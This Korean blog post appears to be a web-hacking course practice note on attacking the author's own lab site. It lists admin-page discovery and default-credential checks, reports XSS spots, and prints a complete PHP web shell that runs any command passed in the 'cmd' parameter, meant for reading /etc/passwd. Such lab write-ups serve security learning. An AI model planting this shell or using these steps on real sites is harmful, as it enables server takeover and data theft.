실습을 위한 개인 호스팅 사이트에서 admin 계정 탈취를 위해서 공격을 해본 결과
3) 기본 관리자 계정 및 패스워드를 입력했을 때 쉽게 유추가능한 값으로 로그인되는 것을 확인했다.
1) 추측하기 쉬운(/admin, /manager, /master, /system, /administrator 등)의 명칭을 사용하는 디렉터리 및 파일 관리자 페이지 존재 여부 확인
2) 추측하기 쉬운(7001, 8080, 8443, 8888 등) 포트의 접속으로 관리자 페이지가 노출되는지 확인
3) 관리자 페이지의 로그인 창에 기본 관리자 계정(admin, administrator, manager) 및 패스워드를 입력하여 로그인되는지 확인
**유추가능한 인증정보 이용(비밀번호)
4) 사용자 인증 후 접근한 관리자 페이지 메인 페이지나 하위 메뉴 페이지 등 중간 페이지(/admin/main.jsp, /admin/menu.html 등) URL으로 인증 과정 없이 직접 접근 가능한지 확인.
또한 XSS 공격지점을 찾아서 리다이렉트 공격을 구현해보고싶었는데 VPN 사설서버대여로 실습이 가능하다고 하니 대여로 구현해보려고 한다. 댓글부분과 검색기능 부분에 XSS 가능성을 발견했다.
또한 파일 업로드 기능으로 웹쉘을 올리고 싶었는데,
<?
echo 'enter a command:<br>';
echo '<form action="">';
echo '<input type=text name="cmd">';
echo '<input type="submit">';
echo '</form>';
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
해당 PHP문을 올려 cmd창에 etc/password 정보를 불러오고싶었는데 시도중이다.
상위 디렉터리로 파일이 저장이 되는것같은데 경로를 타고 올라가는것에 실패중 --
참고 사이트는 다음과 같다.
https://gomguk.tistory.com/62?category=976360
'Web hacking > Nomaltic) 웹 해킹 수업 노트 👩💻' 카테고리의 다른 글
[14주차] 금취분평 취약점, XXE 취약점 (0) | 2022.01.20 |
---|---|
[실습] 쿠폰 중복 적용 취약점 (0) | 2022.01.14 |
[13주차] 금취분평 기준 취약점 항목 (0) | 2022.01.14 |
SQL injection 실습(보고서 작성) (0) | 2022.01.13 |
[11주차] 인증/인가 취약점 수업 필기 (0) | 2021.12.23 |